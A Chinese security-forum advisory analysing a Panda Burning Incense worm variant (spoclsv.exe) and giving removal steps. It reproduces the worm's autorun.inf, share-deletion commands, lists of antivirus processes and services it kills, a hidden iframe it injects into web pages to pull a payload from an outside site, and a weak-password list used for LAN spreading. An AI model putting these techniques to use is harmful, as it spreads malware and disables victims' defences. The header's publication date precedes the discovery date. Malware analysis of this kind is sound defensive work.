本文出自CISRT,转载务必注明出处http://www.cisrt.org/bbs/viewthread.php?tid=633
CISRT关注所有病毒新信息【CISRT2007003】熊猫烧香变种 修改网页文件spoclsv.exe 解决方案档案编号:CISRT2007003
病毒名称:N/A(Kaspersky)
病毒别名:
病毒大小:35,328 字节
加壳方式:
样本MD5:3204b209e9199b644ca76d352fbf84ec
样本SHA1:83dcd1a7f487d160d51b59782efc4c916c3255ac
发现时间:2007.1
更新时间:2007.1
关联病毒:
传播方式:恶意网页、其它病毒下载,还可通过移动磁盘(如U盘)、局域网传播
技术分析
==========
又是一个熊猫烧香变种,运行后复制自身到系统目录下:
%System%\drivers\spoclsv.exe
创建启动项:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svcshare"="%System%\drivers\spoclsv.exe"
在各分区根目录生成病毒副本:
X:\setup.exe
X:\autorun.inf
autorun.inf内容:
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe
使用net share命令关闭管理共享:
cmd.exe /c net share X$ /del /y
cmd.exe /c net share admin$ /del /y
修改“显示所有文件和文件夹”设置:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000000
病毒尝试关闭安全软件相关窗口:
天网
防火墙
进程
VirusScan
NOD32
网镖
杀毒
毒霸
瑞星
江民
黄山IE
超级兔子
优化大师
木马清道夫
木馬清道夫
QQ病毒
注册表编辑器
系统配置实用程序
卡巴斯基反病毒
Symantec AntiVirus
Duba
Windows 任务管理器
esteem procs
绿鹰PC
密码防盗
噬菌体
木马辅助查找器
System Safety Monitor
Wrapped gift Killer
Winsock Expert
游戏木马检测大师
超级巡警
msctls_statusbar32
pjf(ustc)
IceSword
尝试结束安全软件相关进程以及Viking病毒进程:
Mcshield.exe
VsTskMgr.exe
naPrdMgr.exe
UpdaterUI.exe
TBMon.exe
scan32.exe
Ravmond.exe
CCenter.exe
RavTask.exe
Rav.exe
Ravmon.exe
RavmonD.exe
RavStub.exe
KVXP.kxp
KvMonXP.kxp
KVCenter.kxp
KVSrvXP.exe
KRegEx.exe
UIHost.exe
TrojDie.kxp
FrogAgent.exe
Logo1_.exe
Logo_1.exe
Rundl132.exe
禁用安全软件相关服务:
Schedule
sharedaccess
RsCCenter
RsRavMon
KVWSC
KVSrvXP
kavsvc
AVP
McAfeeFramework
McShield
McTaskManager
navapsvc
wscsvc
KPfwSvc
SNDSrvc
ccProxy
ccEvtMgr
ccSetMgr
SPBBCSvc
Symantec Core LC
NPFMntor
MskService
FireSvc
删除安全软件相关启动项:
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RavTask
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KvMonXP
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\kav
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\McAfeeUpdaterUI
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Network Associates Error Reporting Service
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ShStatEXE
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\YLive.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\yassistse
遍历目录修改htm/html/asp/php/jsp/aspx等网页文件,在这些文件尾部追加信息:
<iframe src="hxxp://www.ctv163.com/wuhan/down.htm" width="0" height="0" frameborder="0"> </iframe>
但不修改以下目录中的网页文件:
C:\WINDOWS
C:\WINNT
C:\system32
C:\Documents and Settings
C:\System Volume Information
C:\Recycled
Program Files\Windows NT
Program Files\WindowsUpdate
Program Files\Windows Media Player
Program Files\Outlook Express
Program Files\Internet Explorer
Program Files\NetMeeting
Program Files\Common Files
Program Files\ComPlus Applications
Program Files\Messenger
Program Files\InstallShield Installation Information
Program Files\MSN
Program Files\Microsoft Frontpage
Program Files\Movie Maker
Program Files\MSN Gamin Zone
在访问过的目录下生成Desktop_.ini文件,内容为当前日期,如:2007-1-5
此外,病毒还会尝试删除GHO文件。
病毒还尝试使用弱密码将副本以GameSetup.exe的文件名复制到局域网内其它计算机中:
password
harley
golf
pussy
mustang
shadow
fish
qwerty
baseball
letmein
ccc
admin
abc
pass
passwd
database
abcd
abc123
sybase
123qwe
server
computer
super
123asd
ihavenopass
godblessyou
enable
alpha
1234qwer
123abc
aaa
patrick
pat
administrator
root
sex
god
fuckyou
fuck
test
test123
temp
temp123
win
asdf
pwd
qwer
yxcv
zxcv
home
xxx
owner
login
Login
love
mypc
mypc123
admin123
mypass
mypass123
Administrator
Guest
admin
Root
病毒文件内含有这些信息:
whboy
***武*汉*男*生*感*染*下*载*者***
感谢艾玛,mopery对此木马的关注!~
清除步骤
==========
1. 结束病毒进程:
%System%\drivers\spoclsv.exe
2. 删除病毒文件:
%System%\drivers\spoclsv.exe
3. 删除病毒启动项:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"svcshare"="%System%\drivers\spoclsv.exe"
4. 通过分区盘符右键菜单中的“打开”进入分区根目录,删除根目录下的病毒文件:
X:\setup.exe
X:\autorun.inf
5. 恢复被修改的“显示所有文件和文件夹”设置:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL]
"CheckedValue"=dword:00000001
6. 修复或重新安装被破坏的安全软件
7. 恢复被修改的网页文件,可以使用某些编辑网页的工具替换被添加文字为空
发布时间:2006-01-05 17:10
本文出自CISRT,转载务必注明出处http://www.cisrt.org/bbs/viewthread.php?tid=633
CISRT关注所有病毒新信息
